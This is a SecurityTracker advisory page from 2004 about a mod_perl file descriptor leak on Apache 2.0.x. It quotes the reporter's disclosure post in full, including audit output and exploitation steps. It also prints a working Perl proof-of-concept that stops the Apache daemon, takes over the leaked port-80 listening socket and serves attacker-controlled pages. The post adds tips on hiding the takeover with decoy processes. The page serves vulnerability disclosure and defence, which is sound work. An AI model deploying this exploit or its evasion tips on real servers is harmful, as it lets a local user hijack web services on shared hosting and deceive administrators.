Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Apache mod_perl File Descriptor Leak May Let Local Users Hijack the http and https Services
|
|
SecurityTracker Alert ID: 1008822
|
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Jan 22 2004
|
Impact: Execution of arbitrary code via local system, User access via local system
|
Exploit Included: Yes
|
Version(s): 1.99_09; Tested on Apache 2.0.47
|
Description: A vulnerability was reported in mod_perl for the Apache web server. A local user can hijack the Apache http and https services.
Steve Grubb reported that mod_perl leaks critical file descriptors when running on Apache 2.0.x. A local user can create a Perl
CGI application that can cause Apache to leak a descriptor and then can take control of the affected service.
A demonstration
exploit Perl script is provided in the Source Message.
|
Impact: A local user with CGI script permissions can take control of the running Apache http or https daemon.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: perl.apache.org/ (Links to External Site)
|
Cause: Access control error, Resource error
|
Underlying OS: Linux (Any), UNIX (Any)
|
Reported By: Steve Grubb <linux_4ever@yahoo.com>
|
Message History:
None.
|
Source Message Contents
|
Date: 21 Jan 2004 22:53:33 -0000
From: Steve Grubb <linux_4ever@yahoo.com>
Subject: Hijacking Apache 2 via mod_perl
|
Product: mod_perl
Versions: 1.99_09 / apache 2.0.47
URL: http://perl.apache.org
Impact: Daemon Hijacking
Bug class: Leaked Descriptor
Vendor notified: Yes
Fix available: No
Date: 01/21/04
Issue:
======
Mod_perl under apache 2.0.x leaks critical file descriptors that can be used to takeover (hijack) the
http and https services.
Details:
========
Because apache httpd and mod_perl are inter-related, I don't know if you would consider this an apach
e bug or a mod_perl bug. I am
leaning more towards being a general apache 2.0.x bug.
Due to Red Hat Linux end of life, I started looking at other Linux distributions to recommend to clie
nts. One I am looking at is Mandrake
9.2. So, I decided to see how the default apache implementation is. I used env_audit and performed t
he mod_perl test.
The results are much bigger. So trimming to the interesting stuff, I found the following fd's being l
eaked:
Open file descriptor: 3
Local Port: 443, https
WARNING - Appears to be a listening descriptor - WAHOO!
---
Open file descriptor: 4
Local Port: 80, http
WARNING - Appears to be a listening descriptor - WAHOO!
---
Open file descriptor: 5
The descriptor is: pipe:[20034]
---
Open file descriptor: 6
The descriptor is: pipe:[20034]
---
Open file descriptor: 7
The descriptor is: /var/log/httpd/error_log
---
Open file descriptor: 8
The descriptor is: /var/log/httpd/ssl_error_log
---
Open file descriptor: 9
The descriptor is: /var/log/httpd/access_log
---
Open file descriptor: 10
The descriptor is: pipe:[20035]
---
Open file descriptor: 11
The descriptor is: pipe:[20035]
---
Open file descriptor: 12
The descriptor is: /var/log/httpd/ssl_access_log
---
Open file descriptor: 13
The descriptor is: pipe:[20035]
---
Open file descriptor: 14
The descriptor is: /var/log/httpd/ssl_request_log
---
Open file descriptor: 15
The descriptor is: /var/cache/apache2-mod_ssl/ssl_mutex.6791 (deleted)
---
Open file descriptor: 16
Local Port: 80, http
Wow! That sure is a lot of leaked descriptors. Out of these, we have 2 wahoo's. Since perl has all th
e primitives for writing a network
server, I decided to explore whether or not its possible to hijack the apache 2 server by mod_perl w
ith no helper "C" programs.
Exploit:
========
The technique is simple.
1) Fork and daemonize yourself.
2) Do something evil to apache.
2) Select on the leaked descriptor and start serving pages.
At the end of this advisory is a proof-of-concept program that you can run under mod_perl. It is assu
med
that paying customers can ftp anything they want into their website and mod_perl scripting is enabled
.
cp mod_perl-sploit.pl /var/www/perl
lynx http://localhost/perl/mod_perl-sploit.pl
Now, ps -ef to see how things are going:
apache 3107 2652 0 17:00 ? 00:00:00 httpd2 -f /etc/httpd/conf/httpd2
apache 3108 2640 0 17:00 ? 00:00:00 httpd2 -f /etc/httpd/conf/httpd2
So far, so good...
lynx http://localhost
And you should see the "You're owned" message. The really sneaky part is that 'ps -ef' give
s only a minor hint that apache has been
replaced. The only way to tell something is abnormal is that there's only 2 apache instances when a
normal Mandrake server in its
default configuration shows 5 instances. But, forking off a few decoy children should be easy enough
to do.
This was tested on a fully updated Mandrake 9.2 system.
One other side note, env_audit only showed the normal 3 open descriptors when run on a Red Hat 9 mach
ine. This would indicate a difference
in the implementation of mod_perl between the 2 distributions.
Because env_audit is run as an exec'd program, it may not be able to "see" all the descript
ors that are available to native mod_perl
programs.
Impact:
=======
If you give any client access to mod_perl and they can add a new script, they can hijack apache witho
ut needing root privileges. Sandboxing
or Jailing apache may not help prevent a takeover since the descriptor is leaked into mod_perl.
Note, the https listening descriptor is leaked too. I only wanted to demonstrate the feasibility, so
I picked the simpler of the two.
Solution:
=========
There is no vendor provided solution. Mandrake security has been contacted.
I also contacted the apache project in August 2002 about leaked descriptors. In October 2002, I re-co
ntacted them and they confirmed
the problem. Feb 2003 the leaked file descriptors were reported by myself to vuln-dev mail list. The
bug was partially fixed in apache
2.0.45. Mandrake ships 2.0.47 and seems to leak everything. The patch in 2.0.45 doesn't seem to work
at all for mod_perl.
To see if you are vulnerable, you can use the env_audit
program. It comes with directions for testing mod_perl
in the examples/apache/mod_perl directory.
http://www.web-insights.net/env_audit
Best Regards,
Steve Grubb
The code................
#!/usr/bin/perl
use POSIX qw(setsid);
if (!defined(my $pid = fork)) {
print "Content-Type: text/html\n\n";
print "cannot fork: $!";
exit 1;
} elsif ($pid) { # This is the parent
sleep(1);
print "Content-Type: text/html\n\n";
print "<html><body>Exploit installed</body></html>";
system '/usr/sbin/httpd2 -k stop';
sleep(2);
exit 0;
# This is the Child
setsid;
sleep(2);
my $leak = 4;
open(Server, "+<&$leak");
while (1) {
my $rin = '';
vec($rin,fileno(Server),1) = 1;
$nfound = select($rout = $rin, undef, undef, undef);
if (accept(Client,Server) ) {
print Client "HTTP/1.0 200 OK\n";
print Client "Content-Length: 40\n";
print Client "Content-Type: text/html\n\n";
print Client "<html><body>";
print Client "You're owned.";
print Client "</body></html>";
close Client;
}
|
|
Go to the Top of This SecurityTracker Archive Page
|
